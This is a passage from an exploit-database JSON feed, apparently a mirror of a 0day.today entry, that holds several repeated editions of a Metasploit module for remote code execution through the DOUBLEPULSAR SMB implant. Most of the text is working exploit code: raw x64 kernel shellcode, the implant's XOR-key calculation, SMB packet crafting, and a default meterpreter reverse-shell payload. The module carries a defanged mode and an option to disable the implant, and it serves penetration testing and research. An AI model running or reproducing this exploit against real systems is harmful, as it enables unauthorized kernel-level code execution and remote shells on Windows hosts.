\"\\x80\\x88\\x00\\x00\\x00\\x48\\x01\\xd0\\x50\\x8b\\x48\\x18\\x44\\x8b\\x40\\x20\" \\\r\n \"\\x49\\x01\\xd0\\x48\\xff\\xc9\\x41\\x8b\\x34\\x88\\x48\\x01\\xd6\\xe8\\x78\\xff\" \\\r\n \"\\xff\\xff\\x45\\x39\\xd9\\x75\\xec\\x58\\x44\\x8b\\x40\\x24\\x49\\x01\\xd0\\x66\" \\\r\n \"\\x41\\x8b\\x0c\\x48\\x44\\x8b\\x40\\x1c\\x49\\x01\\xd0\\x41\\x8b\\x04\\x88\\x48\" \\\r\n \"\\x01\\xd0\\x5e\\x59\\x5a\\x41\\x58\\x41\\x59\\x41\\x5b\\x41\\x53\\xff\\xe0\\x56\" \\\r\n \"\\x41\\x57\\x55\\x48\\x89\\xe5\\x48\\x83\\xec\\x20\\x41\\xbb\\xda\\x16\\xaf\\x92\" \\\r\n \"\\xe8\\x4d\\xff\\xff\\xff\\x31\\xc9\\x51\\x51\\x51\\x51\\x41\\x59\\x4c\\x8d\\x05\" \\\r\n \"\\x1a\\x00\\x00\\x00\\x5a\\x48\\x83\\xec\\x20\\x41\\xbb\\x46\\x45\\x1b\\x22\\xe8\" \\\r\n \"\\x68\\xff\\xff\\xff\\x48\\x89\\xec\\x5d\\x41\\x5f\\x5e\\xc3\"\r\n end\r\n\r\n def kernel_shellcode_size\r\n make_kernel_shellcode('').length\r\n end\r\n\r\nend\n\n# 0day.today [2021-09-13] #"}, "lastseen": "2021-09-12T22:14:55", "differentElements": ["sourceData"], "edition": 15}, {"bulletin": {"id": "1337DAY-ID-33895", "vendorId": null, "hash": "cb151cd86f962a4d9d61f369a9a3a781", "type": "zdt", "bulletinFamily": "exploit", "title": "SMB DOUBLEPULSAR Remote Code Execution Exploit", "description": "This Metasploit module executes a Metasploit payload against the Equation Group's DOUBLEPULSAR implant for SMB as popularly deployed by ETERNALBLUE. While this module primarily performs code execution against the implant, the \"Neutralize implant\" target allows you to disable the implant.", "published": "2020-02-04T00:00:00", "modified": "2020-02-04T00:00:00", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}, "cvss2": {"cvssV2": {"accessComplexity": "MEDIUM", "accessVector": "NETWORK", "authentication": "NONE", "availabilityImpact": "COMPLETE", "baseScore": 9.3, "confidentialityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "vectorString": "AV:N/AC:M/Au:N/C:C/I:C/A:C", "version": "2.0"}, "exploitabilityScore": 8.6, "impactScore": 10.0, "obtainAllPrivilege": false, "obtainOtherPrivilege": false, "obtainUserPrivilege": false, "severity": "HIGH", "userInteractionRequired": false}, "cvss3": {"cvssV3": {"attackComplexity": "HIGH", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "baseScore": 8.1, "baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "scope": "UNCHANGED", "userInteraction": "NONE", "vectorString": "CVSS:3.0/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.0"}, "exploitabilityScore": 2.2, "impactScore": 5.9}, "href": "https://0day.today/exploit/description/33895", "reporter": "zdt", "references": [], "cvelist": ["CVE-2017-0148", "CVE-2017-0146", "CVE-2017-0147", "CVE-2017-0145", "CVE-2017-0143", "CVE-2017-0144"], "immutableFields": [], "lastseen": "2021-09-13T22:18:48", "history": [], "viewCount": 110, "enchantments": {"dependencies": {"references": [{"type": "attackerkb", "idList": ["AKB:400EDB06-73BF-4A6D-A113-643077965C7B", "AKB:D476227F-C4B1-49E3-9947-897077E5150D", "AKB:B43D414F-6140-4931-BED8-4AE15FFDFAE1"]}, {"type": "nessus", "idList": ["MS17-010.NASL", "SMB_DOUBLE_PULSAR_BACKDOOR_DETECT.NBIN", "700059.PRM", "SMB_NT_MS17-010.NASL", "700099.PRM"]}, {"type": "exploitdb", "idList": ["EDB-ID:47456", "EDB-ID:42030", "EDB-ID:41891", "EDB-ID:43970", "EDB-ID:42031", "EDB-ID:41987"]}, {"type": "zdt", "idList": ["1337DAY-ID-27752", "1337DAY-ID-27803", "1337DAY-ID-27613", "1337DAY-ID-29702", "1337DAY-ID-33313", "1337DAY-ID-27802", "1337DAY-ID-27786"]}, {"type": "packetstorm", "idList": ["PACKETSTORM:142181", "PACKETSTORM:156196", "PACKETSTORM:142602", "PACKETSTORM:142548", "PACKETSTORM:142603", "PACKETSTORM:146236", "PACKETSTORM:154690"]}, {"type": "f5", "idList": ["F5:K57181937"]}, {"type": "rapid7community", "idList": ["RAPID7COMMUNITY:D6095B3BBE1704D4062E19C249D178EC", "RAPID7COMMUNITY:B91CF4077282454499672A7AD6FBE744", "RAPID7COMMUNITY:3EEFED2F93F50D3C56A51C03A7A3513D", "RAPID7COMMUNITY:9E4E3C72C90426CECD1801D8F0006388", "RAPID7COMMUNITY:4570AAF658D82BF591A6D6AB473704B6", "RAPID7COMMUNITY:761964EB7C8E68AD2D9E6DC0095DF4C0", "RAPID7COMMUNITY:8B3AE9E0999C9317B6911ECE10B8A820", "RAPID7COMMUNITY:958C8DA808BCCA56E72237E0015ED607"]}, {"type": "metasploit", "idList": ["MSF:EXPLOIT/WINDOWS/SMB/DOUBLEPULSAR_RCE", "MSF:EXPLOIT/WINDOWS/SMB/MS17_010_PSEXEC", "MSF:EXPLOIT/WINDOWS/SMB/MS17_010_ETERNALBLUE_WIN8", "MSF:ILITIES/MSFT-CVE-2017-0145/", "MSF:EXPLOIT/WINDOWS/SMB/MS17_010_ETERNALBLUE", "MSF:ILITIES/MSFT-CVE-2017-0146/", "MSF:EXPLOIT/WINDOWS/SMB/SMB_DOUBLEPULSAR_RCE", "MSF:AUXILIARY/ADMIN/SMB/MS17_010_COMMAND", "MSF:AUXILIARY/SCANNER/SMB/SMB_MS17_010"]}, {"type": "openvas", "idList": ["OPENVAS:1361412562310810676", "OPENVAS:1361412562310810810", "OPENVAS:1361412562310810698"]}, {"type": "kaspersky", "idList": ["KLA10977"]}, {"type": "mskb", "idList": ["KB4013389", "KB4012598"]}, {"type": "seebug", "idList": ["SSV:92952", "SSV:92964"]}, {"type": "huawei", "idList": ["HUAWEI-SA-20170513-01-WINDOWS"]}, {"type": "cve", "idList": ["CVE-2017-0146", "CVE-2017-0143", "CVE-2017-0147", "CVE-2017-0145", "CVE-2017-0144", "CVE-2017-0148"]}, {"type": "symantec", "idList": ["SMNTC-96705", "SMNTC-96703", "SMNTC-96704", "SMNTC-96709", "SMNTC-96706", "SMNTC-96707"]}, {"type": "kitploit", "idList": ["KITPLOIT:9146046356497464176"]}, {"type": "trendmicroblog", "idList": ["TRENDMICROBLOG:90481B7D0C6FD15C950712E718E29E3A", "TRENDMICROBLOG:F01C658432B4BB0C2F28F1E5CE666104", "TRENDMICROBLOG:657A275464AD59827A9E6C1CD1726546"]}, {"type": "threatpost", "idList": ["THREATPOST:C95C260596C8EA3C1F60B8BCC0360A41", "THREATPOST:758CC5987A361EA1BB8BBFFC425334D5", "THREATPOST:F569DB7301109F1CDBCA30319EA8E2E7", "THREATPOST:6520102503D39BD2183F4ECDEFA9D591"]}, {"type": "mmpc", "idList": ["MMPC:F4F919BF0CF7F97FD15CFA500398C7D9", "MMPC:F3E0CD42C341A30C758CB85AD9F6D052", "MMPC:89789F73D15A0B331512F90F7E692851"]}, {"type": "canvas", "idList": ["ETERNALBLUE", "MS17_010"]}, {"type": "thn", "idList": ["THN:FF56343C15BACA1C1CE83A105EFD7F77", "THN:F12E2167FDA829ED32C7A16A83B048BF", "THN:2E043D9BAC04DEE81005124DD54A31E2", "THN:18A54BDD63D7DC2B3284D326E6510150", "THN:C50AC2400E56ED88DBA7FC6DAC8360A8"]}, {"type": "qualysblog", "idList": ["QUALYSBLOG:B891CB6093D217510DB7327088AE7FB2"]}, {"type": "mscve", "idList": ["MS:CVE-2017-0143", "MS:CVE-2017-0144", "MS:CVE-2017-0148"]}, {"type": "saint", "idList": ["SAINT:DAEC4BA69103823E03C8F3C832C5B41D", "SAINT:9EF85E0CE1D118D27911357B1C516074", "SAINT:BD676E3751A4D110EAA275BF92CA7E46", "SAINT:64F70C2A6C3961CA44A77286E5B810CD"]}, {"type": "talosblog", "idList": ["TALOSBLOG:E2BCC6AEFE1A7A25F49757116346A7A6"]}, {"type": "myhack58", "idList": ["MYHACK58:62201786371"]}, {"type": "nmap", "idList": ["NMAP:SMB-VULN-MS17-010.NSE"]}, {"type": "carbonblack", "idList": ["CARBONBLACK:6730D6EB8DF875C002A93DBC78C80B9D"]}, {"type": "malwarebytes", "idList": ["MALWAREBYTES:5BE2B1A9C552FAA033E4D4312076FD34"]}, {"type": "avleonov", "idList": ["AVLEONOV:A5219F45CF78A7D911A6EBBE8F9D49B2"]}], "modified": "2021-09-13T22:18:48", "rev": 2}, "score": {"value": 7.5, "vector": "NONE", "modified": "2021-09-13T22:18:48", "rev": 2}}, "objectVersion": "1.6", "sourceHref": "https://0day.today/exploit/33895", "sourceData": "##\r\n# This module requires Metasploit: https://metasploit.com/download\r\n# Current source: https://github.com/rapid7/metasploit-framework\r\n##\r\n\r\nclass MetasploitModule < Msf::Exploit::Remote\r\n\r\n Rank = GreatRanking\r\n\r\n include Msf::Exploit::Remote::SMB::Client\r\n include Msf::Module::Deprecated\r\n\r\n moved_from 'exploit/windows/smb/doublepulsar_rce'\r\n\r\n MAX_SHELLCODE_SIZE = 4096\r\n\r\n def initialize(info = {})\r\n super(update_info(info,\r\n 'Name' => 'SMB DOUBLEPULSAR Remote Code Execution',\r\n 'Description' => %q{\r\n This module executes a Metasploit payload against the Equation Group's\r\n DOUBLEPULSAR implant for SMB as popularly deployed by ETERNALBLUE.\r\n\r\n While this module primarily performs code execution against the implant,\r\n the \"Neutralize implant\" target allows you to disable the implant.\r\n },\r\n 'Author' => [\r\n 'Equation Group', # DOUBLEPULSAR implant\r\n 'Shadow Brokers', # Equation Group dump\r\n 'zerosum0x0', # DOPU analysis and detection\r\n 'Luke Jennings', # DOPU analysis and detection\r\n 'wvu', # Metasploit module and arch detection\r\n 'Jacob Robles' # Metasploit module and RCE help\r\n ],\r\n 'References' => [\r\n ['MSB', 'MS17-010'],\r\n ['CVE', '2017-0143'],\r\n ['CVE', '2017-0144'],\r\n ['CVE', '2017-0145'],\r\n ['CVE', '2017-0146'],\r\n ['CVE', '2017-0147'],\r\n ['CVE', '2017-0148'],\r\n ['URL', 'https://zerosum0x0.blogspot.com/2017/04/doublepulsar-initial-smb-backdoor-ring.html'],\r\n ['URL', 'https://countercept.com/blog/analyzing-the-doublepulsar-kernel-dll-injection-technique/'],\r\n ['URL', 'https://www.countercept.com/blog/doublepulsar-usermode-analysis-generic-reflective-dll-loader/'],\r\n ['URL', 'https://github.com/countercept/doublepulsar-detection-script'],\r\n ['URL', 'https://github.com/countercept/doublepulsar-c2-traffic-decryptor'],\r\n ['URL', 'https://gist.github.com/msuiche/50a36710ee59709d8c76fa50fc987be1']\r\n ],\r\n 'DisclosureDate' => '2017-04-14', # Shadow Brokers leak\r\n 'License' => MSF_LICENSE,\r\n 'Platform' => 'win',\r\n 'Arch' => ARCH_X64,\r\n 'Privileged' => true,\r\n 'Payload' => {\r\n 'Space' => MAX_SHELLCODE_SIZE - kernel_shellcode_size,\r\n 'DisableNops' => true\r\n },\r\n 'Targets' => [\r\n ['Execute payload (x64)',\r\n 'DefaultOptions' => {\r\n 'EXITFUNC' => 'thread',\r\n 'PAYLOAD' => 'windows/x64/meterpreter/reverse_tcp'\r\n }\r\n ],\r\n ['Neutralize implant',\r\n 'DefaultOptions' => {\r\n 'PAYLOAD' => nil # XXX: \"Unset\" generic payload\r\n }\r\n ]\r\n ],\r\n 'DefaultTarget' => 0,\r\n 'Notes' => {\r\n 'AKA' => ['DOUBLEPULSAR'],\r\n 'RelatedModules' => [\r\n 'auxiliary/scanner/smb/smb_ms17_010',\r\n 'exploit/windows/smb/ms17_010_eternalblue'\r\n ],\r\n 'Stability' => [CRASH_OS_DOWN],\r\n 'Reliability' => [REPEATABLE_SESSION]\r\n }\r\n ))\r\n\r\n register_advanced_options([\r\n OptBool.new('DefangedMode', [true, 'Run in defanged mode', true]),\r\n OptString.new('ProcessName', [true, 'Process to inject payload into', 'spoolsv.exe'])\r\n ])\r\n end\r\n\r\n OPCODES = {\r\n ping: 0x23,\r\n exec: 0xc8,\r\n kill: 0x77\r\n }.freeze\r\n\r\n STATUS_CODES = {\r\n not_detected: 0x00,\r\n success: 0x10,\r\n invalid_params: 0x20,\r\n alloc_failure: 0x30\r\n }.freeze\r\n\r\n def calculate_doublepulsar_status(m1, m2)\r\n STATUS_CODES.key(m2.to_i - m1.to_i)\r\n end\r\n\r\n # algorithm to calculate the XOR Key for DoublePulsar knocks\r\n def calculate_doublepulsar_xor_key(s)\r\n x = (2 * s ^ (((s & 0xff00 | (s << 16)) << 8) | (((s >> 16) | s & 0xff0000) >> 8)))\r\n x & 0xffffffff # this line was added just to truncate to 32 bits\r\n end\r\n\r\n # The arch is adjacent to the XOR key in the SMB signature\r\n def calculate_doublepulsar_arch(s)\r\n s == 0 ? ARCH_X86 : ARCH_X64\r\n end\r\n\r\n def generate_doublepulsar_timeout(op)\r\n k = SecureRandom.random_bytes(4).unpack1('V')\r\n 0xff & (op - ((k & 0xffff00) >> 16) - (0xffff & (k & 0xff00) >> 8)) | k & 0xffff00\r\n end\r\n\r\n def generate_doublepulsar_param(op, body)\r\n case OPCODES.key(op)\r\n when :ping, :kill\r\n \"\\x00\" * 12\r\n when :exec\r\n Rex::Text.xor([@xor_key].pack('V'), [body.length, body.length, 0].pack('V*'))\r\n end\r\n end\r\n\r\n def check\r\n ipc_share = \"\\\\\\\\#{rhost}\\\\IPC$\"\r\n\r\n @tree_id = do_smb_setup_tree(ipc_share)\r\n vprint_good(\"Connected to #{ipc_share} with TID = #{@tree_id}\")\r\n vprint_status(\"Target OS is #{smb_peer_os}\")\r\n\r\n print_status('Sending ping to DOUBLEPULSAR')\r\n code, signature1, signature2 = do_smb_doublepulsar_pkt\r\n msg = 'Host is likely INFECTED with DoublePulsar!'\r\n\r\n case calculate_doublepulsar_status(@multiplex_id, code)\r\n when :success\r\n @xor_key = calculate_doublepulsar_xor_key(signature1)\r\n @arch = calculate_doublepulsar_arch(signature2)\r\n\r\n arch_str =\r\n case @arch\r\n when ARCH_X86\r\n 'x86 (32-bit)'\r\n when ARCH_X64\r\n 'x64 (64-bit)'\r\n end\r\n\r\n print_warning(\"#{msg} - Arch: #{arch_str}, XOR Key: 0x#{@xor_key.to_s(16).upcase}\")\r\n CheckCode::Vulnerable\r\n when :not_detected\r\n print_error('DOUBLEPULSAR not detected or disabled')\r\n CheckCode::Safe\r\n else\r\n print_error('An unknown error occurred')\r\n CheckCode::Unknown\r\n end\r\n end\r\n\r\n def exploit\r\n if datastore['DefangedMode']\r\n warning = <<~EOF\r\n\r\n\r\n Are you SURE you want to execute code against a nation-state implant?\r\n You MAY contaminate forensic evidence if there is an investigation.\r\n\r\n Disable the DefangedMode option if you have authorization to proceed.\r\n EOF\r\n\r\n fail_with(Failure::BadConfig, warning)\r\n end\r\n\r\n # No ForceExploit because @tree_id and @xor_key are required\r\n unless check == CheckCode::Vulnerable\r\n fail_with(Failure::NotVulnerable, 'Unable to proceed without DOUBLEPULSAR')\r\n end\r\n\r\n case target.name\r\n when 'Execute payload (x64)'\r\n unless @xor_key\r\n fail_with(Failure::NotFound, 'XOR key not found')\r\n end\r\n\r\n if @arch == ARCH_X86\r\n fail_with(Failure::NoTarget, 'x86 is not a supported target')\r\n end\r\n\r\n print_status(\"Generating kernel shellcode with #{datastore['PAYLOAD']}\")\r\n shellcode = make_kernel_user_payload(payload.encoded, datastore['ProcessName'])\r\n shellcode << rand_text(MAX_SHELLCODE_SIZE - shellcode.length)\r\n vprint_status(\"Total shellcode length: #{shellcode.length} bytes\")\r\n\r\n print_status(\"Encrypting shellcode with XOR key 0x#{@xor_key.to_s(16).upcase}\")\r\n xor_shellcode = Rex::Text.xor([@xor_key].pack('V'), shellcode)\r\n\r\n print_status('Sending shellcode to DOUBLEPULSAR')\r\n code, _signature1, _signature2 = do_smb_doublepulsar_pkt(OPCODES[:exec], xor_shellcode)\r\n when 'Neutralize implant'\r\n return neutralize_implant\r\n end\r\n\r\n case calculate_doublepulsar_status(@multiplex_id, code)\r\n when :success\r\n print_good('Payload execution successful')\r\n when :invalid_params\r\n fail_with(Failure::BadConfig, 'Invalid parameters were specified')\r\n when :alloc_failure\r\n fail_with(Failure::PayloadFailed, 'An allocation failure occurred')\r\n else\r\n fail_with(Failure::Unknown, 'An unknown error occurred')\r\n end\r\n ensure\r\n disconnect\r\n end\r\n\r\n def neutralize_implant\r\n print_status('Neutralizing DOUBLEPULSAR')\r\n code, _signature1, _signature2 = do_smb_doublepulsar_pkt(OPCODES[:kill])\r\n\r\n case calculate_doublepulsar_status(@multiplex_id, code)\r\n when :success\r\n print_good('Implant neutralization successful')\r\n else\r\n fail_with(Failure::Unknown, 'An unknown error occurred')\r\n end\r\n end\r\n\r\n def do_smb_setup_tree(ipc_share)\r\n connect\r\n\r\n # logon as user \\\r\n simple.login(datastore['SMBName'], datastore['SMBUser'], datastore['SMBPass'], datastore['SMBDomain'])\r\n\r\n # connect to IPC$\r\n simple.connect(ipc_share)\r\n\r\n # return tree\r\n simple.shares[ipc_share]\r\n end\r\n\r\n def do_smb_doublepulsar_pkt(opcode = OPCODES[:ping], body = nil)\r\n # make doublepulsar knock\r\n pkt = make_smb_trans2_doublepulsar(opcode, body)\r\n\r\n sock.put(pkt)\r\n bytes = sock.get_once\r\n\r\n return unless bytes\r\n\r\n # convert packet to response struct\r\n pkt = Rex::Proto::SMB::Constants::SMB_TRANS_RES_HDR_PKT.make_struct\r\n pkt.from_s(bytes[4..-1])\r\n\r\n return pkt['SMB'].v['MultiplexID'], pkt['SMB'].v['Signature1'], pkt['SMB'].v['Signature2']\r\n end\r\n\r\n def make_smb_trans2_doublepulsar(opcode, body)\r\n setup_count = 1\r\n setup_data = [0x000e].pack('v')\r\n\r\n param = generate_doublepulsar_param(opcode, body)\r\n data = param + body.to_s\r\n\r\n pkt = Rex::Proto::SMB::Constants::SMB_TRANS2_PKT.make_struct\r\n simple.client.smb_defaults(pkt['Payload']['SMB'])\r\n\r\n base_offset = pkt.to_s.length + (setup_count * 2) - 4\r\n param_offset = base_offset\r\n data_offset = param_offset + param.length\r\n\r\n pkt['Payload']['SMB'].v['Command'] = CONST::SMB_COM_TRANSACTION2\r\n pkt['Payload']['SMB'].v['Flags1'] = 0x18\r\n pkt['Payload']['SMB'].v['Flags2'] = 0xc007\r\n\r\n @multiplex_id = rand(0xffff)\r\n\r\n pkt['Payload']['SMB'].v['WordCount'] = 14 + setup_count\r\n pkt['Payload']['SMB'].v['TreeID'] = @tree_id\r\n pkt['Payload']['SMB'].v['MultiplexID'] = @multiplex_id\r\n\r\n pkt['Payload'].v['ParamCountTotal'] = param.length\r\n pkt['Payload'].v['DataCountTotal'] = body.to_s.length\r\n pkt['Payload'].v['ParamCountMax'] = 1\r\n pkt['Payload'].v['DataCountMax'] = 0\r\n pkt['Payload'].v['ParamCount'] = param.length\r\n pkt['Payload'].v['ParamOffset'] = param_offset\r\n pkt['Payload'].v['DataCount'] = body.to_s.length\r\n pkt['Payload'].v['DataOffset'] = data_offset\r\n pkt['Payload'].v['SetupCount'] = setup_count\r\n pkt['Payload'].v['SetupData'] = setup_data\r\n pkt['Payload'].v['Timeout'] = generate_doublepulsar_timeout(opcode)\r\n pkt['Payload'].v['Payload'] = data\r\n\r\n pkt.to_s\r\n end\r\n\r\n # ring3 = user mode encoded payload\r\n # proc_name = process to inject APC into\r\n def make_kernel_user_payload(ring3, proc_name)\r\n sc = make_kernel_shellcode(proc_name)\r\n\r\n sc << [ring3.length].pack('S<')\r\n sc << ring3\r\n\r\n sc\r\n end\r\n\r\n def generate_process_hash(process)\r\n # x64_calc_hash from external/source/shellcode/windows/multi_arch_kernel_queue_apc.asm\r\n proc_hash = 0\r\n process << \"\\x00\"\r\n\r\n process.each_byte do |c|\r\n proc_hash = ror(proc_hash, 13)\r\n proc_hash += c\r\n end\r\n\r\n [proc_hash].pack('l<')\r\n end\r\n\r\n def ror(dword, bits)\r\n (dword >> bits | dword << (32 - bits)) & 0xFFFFFFFF\r\n end\r\n\r\n def make_kernel_shellcode(proc_name)\r\n # see: external/source/shellcode/windows/multi_arch_kernel_queue_apc.asm\r\n # Length: 780 bytes\r\n \"\\x31\\xc9\\x41\\xe2\\x01\\xc3\\x56\\x41\\x57\\x41\\x56\\x41\\x55\\x41\\x54\\x53\" \\\r\n \"\\x55\\x48\\x89\\xe5\\x66\\x83\\xe4\\xf0\\x48\\x83\\xec\\x20\\x4c\\x8d\\x35\\xe3\" \\\r\n \"\\xff\\xff\\xff\\x65\\x4c\\x8b\\x3c\\x25\\x38\\x00\\x00\\x00\\x4d\\x8b\\x7f\\x04\" \\\r\n \"\\x49\\xc1\\xef\\x0c\\x49\\xc1\\xe7\\x0c\\x49\\x81\\xef\\x00\\x10\\x00\\x00\\x49\" \\\r\n \"\\x8b\\x37\\x66\\x81\\xfe\\x4d\\x5a\\x75\\xef\\x41\\xbb\\x5c\\x72\\x11\\x62\\xe8\" \\\r\n \"\\x18\\x02\\x00\\x00\\x48\\x89\\xc6\\x48\\x81\\xc6\\x08\\x03\\x00\\x00\\x41\\xbb\" \\\r\n \"\\x7a\\xba\\xa3\\x30\\xe8\\x03\\x02\\x00\\x00\\x48\\x89\\xf1\\x48\\x39\\xf0\\x77\" \\\r\n \"\\x11\\x48\\x8d\\x90\\x00\\x05\\x00\\x00\\x48\\x39\\xf2\\x72\\x05\\x48\\x29\\xc6\" \\\r\n \"\\xeb\\x08\\x48\\x8b\\x36\\x48\\x39\\xce\\x75\\xe2\\x49\\x89\\xf4\\x31\\xdb\\x89\" \\\r\n \"\\xd9\\x83\\xc1\\x04\\x81\\xf9\\x00\\x00\\x01\\x00\\x0f\\x8d\\x66\\x01\\x00\\x00\" \\\r\n \"\\x4c\\x89\\xf2\\x89\\xcb\\x41\\xbb\\x66\\x55\\xa2\\x4b\\xe8\\xbc\\x01\\x00\\x00\" \\\r\n \"\\x85\\xc0\\x75\\xdb\\x49\\x8b\\x0e\\x41\\xbb\\xa3\\x6f\\x72\\x2d\\xe8\\xaa\\x01\" \\\r\n \"\\x00\\x00\\x48\\x89\\xc6\\xe8\\x50\\x01\\x00\\x00\\x41\\x81\\xf9\" +\r\n generate_process_hash(proc_name.upcase) +\r\n \"\\x75\\xbc\\x49\\x8b\\x1e\\x4d\\x8d\\x6e\\x10\\x4c\\x89\\xea\\x48\\x89\\xd9\" \\\r\n \"\\x41\\xbb\\xe5\\x24\\x11\\xdc\\xe8\\x81\\x01\\x00\\x00\\x6a\\x40\\x68\\x00\\x10\" \\\r\n \"\\x00\\x00\\x4d\\x8d\\x4e\\x08\\x49\\xc7\\x01\\x00\\x10\\x00\\x00\\x4d\\x31\\xc0\" \\\r\n \"\\x4c\\x89\\xf2\\x31\\xc9\\x48\\x89\\x0a\\x48\\xf7\\xd1\\x41\\xbb\\x4b\\xca\\x0a\" \\\r\n \"\\xee\\x48\\x83\\xec\\x20\\xe8\\x52\\x01\\x00\\x00\\x85\\xc0\\x0f\\x85\\xc8\\x00\" \\\r\n \"\\x00\\x00\\x49\\x8b\\x3e\\x48\\x8d\\x35\\xe9\\x00\\x00\\x00\\x31\\xc9\\x66\\x03\" \\\r\n \"\\x0d\\xd7\\x01\\x00\\x00\\x66\\x81\\xc1\\xf9\\x00\\xf3\\xa4\\x48\\x89\\xde\\x48\" \\\r\n \"\\x81\\xc6\\x08\\x03\\x00\\x00\\x48\\x89\\xf1\\x48\\x8b\\x11\\x4c\\x29\\xe2\\x51\" \\\r\n \"\\x52\\x48\\x89\\xd1\\x48\\x83\\xec\\x20\\x41\\xbb\\x26\\x40\\x36\\x9d\\xe8\\x09\" \\\r\n \"\\x01\\x00\\x00\\x48\\x83\\xc4\\x20\\x5a\\x59\\x48\\x85\\xc0\\x74\\x18\\x48\\x8b\" \\\r\n \"\\x80\\xc8\\x02\\x00\\x00\\x48\\x85\\xc0\\x74\\x0c\\x48\\x83\\xc2\\x4c\\x8b\\x02\" \\\r\n \"\\x0f\\xba\\xe0\\x05\\x72\\x05\\x48\\x8b\\x09\\xeb\\xbe\\x48\\x83\\xea\\x4c\\x49\" \\\r\n \"\\x89\\xd4\\x31\\xd2\\x80\\xc2\\x90\\x31\\xc9\\x41\\xbb\\x26\\xac\\x50\\x91\\xe8\" \\\r\n \"\\xc8\\x00\\x00\\x00\\x48\\x89\\xc1\\x4c\\x8d\\x89\\x80\\x00\\x00\\x00\\x41\\xc6\" \\\r\n \"\\x01\\xc3\\x4c\\x89\\xe2\\x49\\x89\\xc4\\x4d\\x31\\xc0\\x41\\x50\\x6a\\x01\\x49\" \\\r\n \"\\x8b\\x06\\x50\\x41\\x50\\x48\\x83\\xec\\x20\\x41\\xbb\\xac\\xce\\x55\\x4b\\xe8\" \\\r\n \"\\x98\\x00\\x00\\x00\\x31\\xd2\\x52\\x52\\x41\\x58\\x41\\x59\\x4c\\x89\\xe1\\x41\" \\\r\n \"\\xbb\\x18\\x38\\x09\\x9e\\xe8\\x82\\x00\\x00\\x00\\x4c\\x89\\xe9\\x41\\xbb\\x22\" \\\r\n \"\\xb7\\xb3\\x7d\\xe8\\x74\\x00\\x00\\x00\\x48\\x89\\xd9\\x41\\xbb\\x0d\\xe2\\x4d\" \\\r\n \"\\x85\\xe8\\x66\\x00\\x00\\x00\\x48\\x89\\xec\\x5d\\x5b\\x41\\x5c\\x41\\x5d\\x41\" \\\r\n \"\\x5e\\x41\\x5f\\x5e\\xc3\\xe9\\xb5\\x00\\x00\\x00\\x4d\\x31\\xc9\\x31\\xc0\\xac\" \\\r\n \"\\x41\\xc1\\xc9\\x0d\\x3c\\x61\\x7c\\x02\\x2c\\x20\\x41\\x01\\xc1\\x38\\xe0\\x75\" \\\r\n \"\\xec\\xc3\\x31\\xd2\\x65\\x48\\x8b\\x52\\x60\\x48\\x8b\\x52\\x18\\x48\\x8b\\x52\" \\\r\n \"\\x20\\x48\\x8b\\x12\\x48\\x8b\\x72\\x50\\x48\\x0f\\xb7\\x4a\\x4a\\x45\\x31\\xc9\" \\\r\n \"\\x31\\xc0\\xac\\x3c\\x61\\x7c\\x02\\x2c\\x20\\x41\\xc1\\xc9\\x0d\\x41\\x01\\xc1\" \\\r\n \"\\xe2\\xee\\x45\\x39\\xd9\\x75\\xda\\x4c\\x8b\\x7a\\x20\\xc3\\x4c\\x89\\xf8\\x41\" \\\r\n \"\\x51\\x41\\x50\\x52\\x51\\x56\\x48\\x89\\xc2\\x8b\\x42\\x3c\\x48\\x01\\xd0\\x8b\" \\\r\n \"\\x80\\x88\\x00\\x00\\x00\\x48\\x01\\xd0\\x50\\x8b\\x48\\x18\\x44\\x8b\\x40\\x20\" \\\r\n \"\\x49\\x01\\xd0\\x48\\xff\\xc9\\x41\\x8b\\x34\\x88\\x48\\x01\\xd6\\xe8\\x78\\xff\" \\\r\n \"\\xff\\xff\\x45\\x39\\xd9\\x75\\xec\\x58\\x44\\x8b\\x40\\x24\\x49\\x01\\xd0\\x66\" \\\r\n \"\\x41\\x8b\\x0c\\x48\\x44\\x8b\\x40\\x1c\\x49\\x01\\xd0\\x41\\x8b\\x04\\x88\\x48\" \\\r\n \"\\x01\\xd0\\x5e\\x59\\x5a\\x41\\x58\\x41\\x59\\x41\\x5b\\x41\\x53\\xff\\xe0\\x56\" \\\r\n \"\\x41\\x57\\x55\\x48\\x89\\xe5\\x48\\x83\\xec\\x20\\x41\\xbb\\xda\\x16\\xaf\\x92\" \\\r\n \"\\xe8\\x4d\\xff\\xff\\xff\\x31\\xc9\\x51\\x51\\x51\\x51\\x41\\x59\\x4c\\x8d\\x05\" \\\r\n \"\\x1a\\x00\\x00\\x00\\x5a\\x48\\x83\\xec\\x20\\x41\\xbb\\x46\\x45\\x1b\\x22\\xe8\" \\\r\n \"\\x68\\xff\\xff\\xff\\x48\\x89\\xec\\x5d\\x41\\x5f\\x5e\\xc3\"\r\n end\r\n\r\n def kernel_shellcode_size\r\n make_kernel_shellcode('').length\r\n end\r\n\r\nend\n\n# 0day.today [2021-09-14] #"}, "lastseen": "2021-09-13T22:18:48", "differentElements": ["sourceData"], "edition": 16}, {"bulletin": {"id": "1337DAY-ID-33895", "vendorId": null, "hash": "d0de1e6bbd3420c50ba71cf6cd360164", "type": "zdt", "bulletinFamily": "exploit", "title": "SMB DOUBLEPULSAR Remote Code Execution Exploit", "description": "This Metasploit module executes a Metasploit payload against the Equation Group's DOUBLEPULSAR implant for SMB as popularly deployed by ETERNALBLUE. While this module primarily performs code execution against the implant, the \"Neutralize implant\" target allows you to disable the implant.", "published": "2020-02-04T00:00:00", "modified": "2020-02-04T00:00:00", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}, "cvss2": {"cvssV2": {"accessComplexity": "MEDIUM", "accessVector": "NETWORK", "authentication": "NONE", "availabilityImpact": "COMPLETE", "baseScore": 9.3, "confidentialityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "vectorString": "AV:N/AC:M/Au:N/C:C/I:C/A:C", "version": "2.0"}, "exploitabilityScore": 8.6, "impactScore": 10.0, "obtainAllPrivilege": false, "obtainOtherPrivilege": false, "obtainUserPrivilege": false, "severity": "HIGH", "userInteractionRequired": false}, "cvss3": {"cvssV3": {"attackComplexity": "HIGH", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "baseScore": 8.1, "baseSeverity": 